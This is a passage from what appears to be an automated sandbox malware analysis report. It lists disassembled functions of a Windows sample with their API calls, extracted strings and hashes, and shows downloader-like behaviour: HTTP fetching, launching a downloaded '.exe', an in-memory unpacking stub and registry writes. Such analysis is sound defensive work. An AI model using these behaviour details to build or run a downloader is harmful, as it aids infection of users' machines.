235->240 252 406871-406876 240->252 253 40682e-406831 240->253 257 406878-40687a 252->257 258 40687c-40687e 252->258 259 406833-40683a 253->259 260 40688a-4068b1 call 40a800 call 4021f0 * 2 call 4016d0 253->260 264 406881-406883 257->264 258->264 259->230 266 40683c-406845 259->266 260->168 264->260 272 406885 call 4045e0 264->272 274 406847-406855 266->274 275 40685b-406862 call 40cfc3 266->275 329 406b01-406b78 call 4079d0 call 40a420 call 4022c0 call 402240 call 4021f0 call 407a50 call 40a440 call 4022c0 call 402240 call 4021f0 call 407ad0 call 40a480 call 4022c0 call 40a620 call 4021f0 269->329 330 406bbf-406bea call 407cf0 call 40a400 call 4022c0 call 40a620 call 4021f0 269->330 425 406a98-406ac3 call 407840 call 40a480 call 4022c0 call 40a620 call 4021f0 270->425 426 406a7b call 4077c0 270->426 272->260 274->143 274->275 275->230 500 406b84-406baf call 407be0 call 40a480 call 4022c0 call 40a620 call 4021f0 329->500 501 406b7a-406b7f call 407b60 329->501 379 406bf0-406c8d call 407d70 call 40a460 call 4022c0 call 402240 call 4021f0 call 407df0 call 40a440 call 4022c0 call 402240 call 4021f0 call 407e70 call 40a400 call 4022c0 call 402240 call 4021f0 call 407ef0 call 40a3d0 call 4022c0 call 40a620 call 4021f0 330->379 380 406cd4-406cff call 408110 call 40a3a0 call 4022c0 call 40a620 call 4021f0 330->380 353 406f5a-4070ab call 401670 call 408a70 call 40a480 call 4022c0 call 4089f0 call 40a460 call 4022c0 call 408950 call 40a4e0 call 4022c0 call 40ad00 call 40ad60 call 40ae10 call 40ad60 call 40ae10 call 40ad60 call 4021f0 * 8 348->353 354 406f4d-406f55 call 4021c0 348->354 645 4070b1-4070ca call 4021b0 call 402030 353->645 354->353 628 406c99-406cc4 call 408000 call 40a3d0 call 4022c0 call 40a620 call 4021f0 379->628 629 406c8f-406c94 call 407f80 379->629 434 406d01-406d7a call 4081a0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408220 call 40a480 call 4022c0 call 402240 call 4021f0 call 4082b0 call 40a400 call 4022c0 call 402240 call 4021f0 380->434 435 406d7f-406daa call 408330 call 40a480 call 4022c0 call 40a620 call 4021f0 380->435 425->348 496 406ac9-406ace call 4078d0 425->496 433 406a80-406a93 call 40a460 call 4022c0 426->433 469 406f3b-406f44 call 402240 call 4021f0 433->469 434->348 515 406e2a-406e55 call 408540 call 40a4b0 call 4022c0 call 40a620 call 4021f0 435->515 516 406dac-406e25 call 4083c0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408440 call 40a460 call 4022c0 call 402240 call 4021f0 call 4084c0 call 40a400 call 4022c0 call 402240 call 4021f0 435->516 469->348 496->433 500->348 570 406bb5-406bba call 407c70 500->570 501->433 579 406e57-406ea8 call 4085d0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408650 call 40a400 call 4022c0 call 402240 call 4021f0 call 4086d0 515->579 580 406eaa-406ed5 call 408750 call 40a400 call 4022c0 call 40a620 call 4021f0 515->580 516->348 570->330 706 406f28-406f38 call 40a400 call 4022c0 579->706 580->348 648 406ed7-406f23 call 4087d0 call 40a440 call 4022c0 call 402240 call 4021f0 call 408850 call 40a460 call 4022c0 call 402240 call 4021f0 call 4088d0 580->648 628->348 688 406cca-406ccf call 408090 628->688 629->628 666 40710a-407111 Sleep 645->666 667 4070cc-4070ef call 402070 call 4022c0 call 4025b0 645->667 648->706 666->645 701 4070f1-407100 call 4025b0 667->701 702 407113-40717a call 4021f0 call 40a850 * 3 call 4058d0 667->702 688->380 701->702 715 407102-407105 call 4021f0 701->715 733 407193-4071be call 408b00 call 40a4b0 call 4022c0 call 40a620 call 4021f0 702->733 734 40717c-40718b call 40a850 call 404750 702->734 706->469 715->666 749 407260-407291 call 408c70 call 40a480 call 4022c0 call 40a620 call 4021f0 733->749 750 4071c4-4071f9 call 401670 call 408b90 call 40a350 call 4022c0 733->750 742 407190 734->742 742->733 772 407293-4072f8 call 408de0 call 40a460 call 4022c0 call 408d60 call 40a460 call 4022c0 call 408d00 call 40a330 call 4022c0 call 406270 749->772 773 4072fb-407300 call 4045e0 749->773 767 407200-407216 call 4021b0 call 402030 750->767 781 407227-407244 call 402070 call 4022c0 call 4021f0 767->781 782 407218-407223 Sleep 767->782 772->773 787 407249-40725b call 4021f0 call 4016d0 781->787 782->767 784 407225 782->784 784->787 787->749
                                                              APIs
                                                                • Part of subcall function 00414F0A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040591F,00000000,A1833436), ref: 00414F1D
                                                                • Part of subcall function 00414F0A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F4E
                                                              • Sleep.KERNELBASE(000003E8,?,756CD120), ref: 00406430
                                                              • __Init_thread_footer.LIBCMT ref: 00406662
                                                              • Sleep.KERNEL32(00000BB8,00000000,?,00438C00,00438ED4,00438ED5,?,?,?,?,?,?,?,00000001,SUB=,00000004), ref: 0040686A
                                                                • Part of subcall function 00407390: __Init_thread_footer.LIBCMT ref: 004073F9
                                                                • Part of subcall function 00407420: __Init_thread_footer.LIBCMT ref: 0040747A
                                                              • Sleep.KERNEL32(00000BB8,00000000,?,?,?,?,?,00433998,00000000,00000000,?,00000000,00000001,SUB=,00000004), ref: 0040710F
                                                              • Sleep.KERNEL32(00000BB8,00000000,00000000,00433998), ref: 0040721D
                                                                • Part of subcall function 00408C70: __Init_thread_footer.LIBCMT ref: 00408CD9
                                                                • Part of subcall function 00408DE0: __Init_thread_footer.LIBCMT ref: 00408E39
                                                                • Part of subcall function 00408D60: __Init_thread_footer.LIBCMT ref: 00408DB9
                                                                • Part of subcall function 00408D00: __Init_thread_footer.LIBCMT ref: 00408D51
                                                                • Part of subcall function 004063D0: RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004062A3
                                                                • Part of subcall function 004063D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 004062C5
                                                                • Part of subcall function 004063D0: RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 004062ED
                                                                • Part of subcall function 004063D0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004062F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Init_thread_footer$Sleep$Time$CloseCreateFileOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                              • String ID: @BAO$O@K\$SUB=$Y@BA$ZK\.$get$mixone$rmBK$updateSW$>
                                                              • API String ID: 1876388665-2074545787
                                                              • Opcode ID: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                              • Instruction ID: 5f27ce350e39438f477c09faef13317f674b6310b8c83854bcab6de2c29012ff
                                                              • Opcode Fuzzy Hash: c9853fe243ca87616cf0691cce8571791723dccf944e3495869a65eaa89bf389
                                                              • Instruction Fuzzy Hash: 19829571D102049ACB15FBB5D95AAEEB3746F14308F10817FE412771D2EE7C6A48CBAA
                                                              Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                              • __cftof.LIBCMT ref: 10001624
                                                              • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                              • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                              • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                              • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                              • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                              • String ID: GET$http://
                                                              • API String ID: 1233269984-1632879366
                                                              • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                              • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                              • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                              • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                                              Function 00401700 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 103networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401777
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 0040179D
                                                                • Part of subcall function 00402460: Concurrency::cancel_current_task.LIBCPMT ref: 00402593
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017C3
                                                              • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017E9
                                                              Strings
                                                              • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004017C7
                                                              • GET, xrefs: 00401F41
                                                              • text, xrefs: 00401B1C
                                                              • Pa3o, xrefs: 00401EBE
                                                              • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017A1
                                                              • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401739
                                                              • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 0040177B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                              • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$Pa3o$text
                                                              • API String ID: 2146599340-3316554447
                                                              • Opcode ID: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                              • Instruction ID: dd27eeabaf9dd409a411fe115e39f4e0811eb9476ae1debadf98a18efd4bf4d9
                                                              • Opcode Fuzzy Hash: 0e58c970b9ceb9900320a8565722ff61c5d3bffa70bbdad101db58370e9d90cb
                                                              • Instruction Fuzzy Hash: AF314271D00108AFDB14DFA9CC85FEEBB79EB48714F60C02AE521761D0D778A644CBA5
                                                              Function 0217003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1116 217003c-2170047 1117 217004c-2170263 call 2170a3f call 2170e0f call 2170d90 VirtualAlloc 1116->1117 1118 2170049 1116->1118 1133 2170265-2170289 call 2170a69 1117->1133 1134 217028b-2170292 1117->1134 1118->1117 1139 21702ce-21703c2 VirtualProtect call 2170cce call 2170ce7 1133->1139 1135 21702a1-21702b0 1134->1135 1138 21702b2-21702cc 1135->1138 1135->1139 1138->1135 1145 21703d1-21703e0 1139->1145 1146 21703e2-2170437 call 2170ce7 1145->1146 1147 2170439-21704b8 VirtualFree 1145->1147 1146->1145 1148 21705f4-21705fe 1147->1148 1149 21704be-21704cd 1147->1149 1152 2170604-217060d 1148->1152 1153 217077f-2170789 1148->1153 1151 21704d3-21704dd 1149->1151 1151->1148 1157 21704e3-2170505 LoadLibraryA 1151->1157 1152->1153 1158 2170613-2170637 1152->1158 1155 21707a6-21707b0 1153->1155 1156 217078b-21707a3 1153->1156 1160 21707b6-21707cb 1155->1160 1161 217086e-21708be LoadLibraryA 1155->1161 1156->1155 1162 2170517-2170520 1157->1162 1163 2170507-2170515 1157->1163 1164 217063e-2170648 1158->1164 1165 21707d2-21707d5 1160->1165 1168 21708c7-21708f9 1161->1168 1166 2170526-2170547 1162->1166 1163->1166 1164->1153 1167 217064e-217065a 1164->1167 1169 21707d7-21707e0 1165->1169 1170 2170824-2170833 1165->1170 1171 217054d-2170550 1166->1171 1167->1153 1172 2170660-217066a 1167->1172 1173 2170902-217091d 1168->1173 1174 21708fb-2170901 1168->1174 1175 21707e4-2170822 1169->1175 1176 21707e2 1169->1176 1180 2170839-217083c 1170->1180 1177 2170556-217056b 1171->1177 1178 21705e0-21705ef 1171->1178 1179 217067a-2170689 1172->1179 1174->1173 1175->1165 1176->1170 1181 217056f-217057a 1177->1181 1182 217056d 1177->1182 1178->1151 1183 2170750-217077a 1179->1183 1184 217068f-21706b2 1179->1184 1180->1161 1185 217083e-2170847 1180->1185 1187 217057c-2170599 1181->1187 1188 217059b-21705bb 1181->1188 1182->1178 1183->1164 1189 21706b4-21706ed 1184->1189 1190 21706ef-21706fc 1184->1190 1191 217084b-217086c 1185->1191 1192 2170849 1185->1192 1199 21705bd-21705db 1187->1199 1188->1199 1189->1190 1193 21706fe-2170748 1190->1193 1194 217074b 1190->1194 1191->1180 1192->1161 1193->1194 1194->1179 1199->1171
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0217024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 20d72d97d4b91e157398b5588176fb2569ed1a9d1da1e1fd342d4343e33d2590
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: C7526975A01229DFDB64CF58C984BACBBB1BF49304F1580E9E94DAB351DB30AA85CF14
                                                              Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1256 10001175-100011a6 call 1000e8e7 1259 100011a8-100011bd call 1000270d 1256->1259 1260 100011bf 1256->1260 1262 100011c5-100011dd InternetSetFilePointer 1259->1262 1260->1262 1264 100011e3-1000121b InternetReadFile 1262->1264 1265 10001253-1000125a 1264->1265 1266 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1264->1266 1267 10001260-100012a0 call 10003c40 HttpQueryInfoA 1265->1267 1268 1000125c-1000125e 1265->1268 1266->1265 1274 100012a6-100012d2 CoCreateInstance 1267->1274 1275 1000150a-10001520 call 1000e8a5 1267->1275 1268->1264 1268->1267 1274->1275 1278 100012d8-100012df 1274->1278 1278->1275 1281 100012e5-10001316 call 1000184b call 10001006 1278->1281 1287 10001318 1281->1287 1288 1000131a-10001351 call 10001c08 call 10001bb9 1281->1288 1287->1288 1294 10001357-1000135e 1288->1294 1295 100014fe-10001505 1288->1295 1294->1295 1296 10001364-100013cc call 1000270d 1294->1296 1295->1275 1300 100013d2-100013e8 1296->1300 1301 100014e6-100014f9 call 10002724 1296->1301 1303 10001486-10001497 1300->1303 1304 100013ee-1000141d call 1000270d 1300->1304 1301->1295 1305 10001499-1000149b 1303->1305 1306 100014dc-100014e4 1303->1306 1312 1000146e-10001483 call 10002724 1304->1312 1313 1000141f-10001421 1304->1313 1309 100014aa-100014ac 1305->1309 1310 1000149d-100014a8 call 10005926 1305->1310 1306->1301 1315 100014c0-100014d1 call 10003c40 call 10005926 1309->1315 1316 100014ae-100014be call 100050e0 1309->1316 1326 100014d7 call 1000584c 1310->1326 1312->1303 1317 10001423-10001425 1313->1317 1318 10001434-10001447 call 10003c40 1313->1318 1315->1326 1316->1306 1317->1318 1323 10001427-10001432 call 100050e0 1317->1323 1335 10001456-1000145c 1318->1335 1336 10001449-10001454 call 10005926 1318->1336 1323->1312 1326->1306 1335->1312 1338 1000145e-10001463 call 10005926 1335->1338 1341 10001469 call 1000584c 1336->1341 1338->1341 1341->1312
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                              • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                              • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                              • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                              • String ID: text
                                                              • API String ID: 1154000607-999008199
                                                              • Opcode ID: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                              • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                              • Opcode Fuzzy Hash: f206d19b4f254f0d6769d041d1967d247a093756c437c0eb0d60e70cbfafb4d3
                                                              • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                              Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                                • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: .exe$open
                                                              • API String ID: 1627157292-49952409
                                                              • Opcode ID: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                              • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                              • Opcode Fuzzy Hash: 56d22cbb363ef52b0cda4d79fccaca7080f97512d5dca005a7fc8db3fc5e430b
                                                              • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                              Function 00401D20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1411 401d20-401d6e 1412 401d72-401d77 1411->1412 1412->1412 1413 401d79-401fd3 call 402460 call 402640 call 402460 call 40e400 call 411414 InternetOpenA 1412->1413 1428 401fd5-401fe1 1413->1428 1429 401ffd-40201a call 40cd83 1413->1429 1431 401ff3-401ffa call 40cfc3 1428->1431 1432 401fe3-401ff1 1428->1432 1431->1429 1432->1431 1433 402022-402059 call 411337 call 401d20 1432->1433
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: http://
                                                              • API String ID: 0-1121587658
                                                              • Opcode ID: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                              • Instruction ID: 400ae1f0683e16050dc0c92ac0c9e39ab50ada623451b1719e06fb015b7fc8db
                                                              • Opcode Fuzzy Hash: 6907100a034e059a4106fe1f63b2c5033b6593f1fce55d5f4e41db25ecc671bd
                                                              • Instruction Fuzzy Hash: 9551C171E002099FDB14CFA8C885BEEBBB5EF48714F20812AE811B72D1D7799945CBA4
                                                              Function 00402080 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1442 402080-40209b 1443 4020fb-40210c call 40cd83 1442->1443 1444 40209d-4020a1 1442->1444 1444->1443 1445 4020a3-4020c1 CreateFileA 1444->1445 1445->1443 1447 4020c3-4020f0 WriteFile CloseHandle call 40cd83 1445->1447 1450 4020f5-4020f8 1447->1450
                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020B6
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 004020D7
                                                              • CloseHandle.KERNEL32(00000000), ref: 004020DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleWrite
                                                              • String ID:
                                                              • API String ID: 1065093856-0
                                                              • Opcode ID: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                              • Instruction ID: 6c77038d191d3f97727d8eed6fdb37873f2ee397ff2ea2baf70002bfc895bc0c
                                                              • Opcode Fuzzy Hash: 9a7e1187f18d3ebfa534ae983d304b852045277601f3c95029d7f3444259bd02
                                                              • Instruction Fuzzy Hash: AA01DB31601204EBD730DB68DD49BAEB7A4EB48720F40413EFA45A61D0CEB46945DB98
                                                              Function 02170E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02170223,?,?), ref: 02170E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02170223,?,?), ref: 02170E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: f6eda14345538900ca3a5bcd661a1e8535e70606a6f2fc7bf9789d366219cde3
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: 9DD0123114522877D7002A94DC09BCD7B1CDF09B66F108011FB0DD9080CB70954046E5
                                                              Function 0041A395 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                              • Instruction ID: 892a2f85d179e940e32edf4c269616ac7a5d26f5bdb6421d04aa5267c10937ef
                                                              • Opcode Fuzzy Hash: a8f23313f6675ffa9e48e163953c56306ede8fe599d825346f1131c99d372f44
                                                              • Instruction Fuzzy Hash: 39E02B31643228E6D7212726AC00BDBB6499F417B0F550127FC64D2291CF6CDCD1C1AF
                                                              Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                              • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                              • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                              • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                              Function 00413388 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 0041339B
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
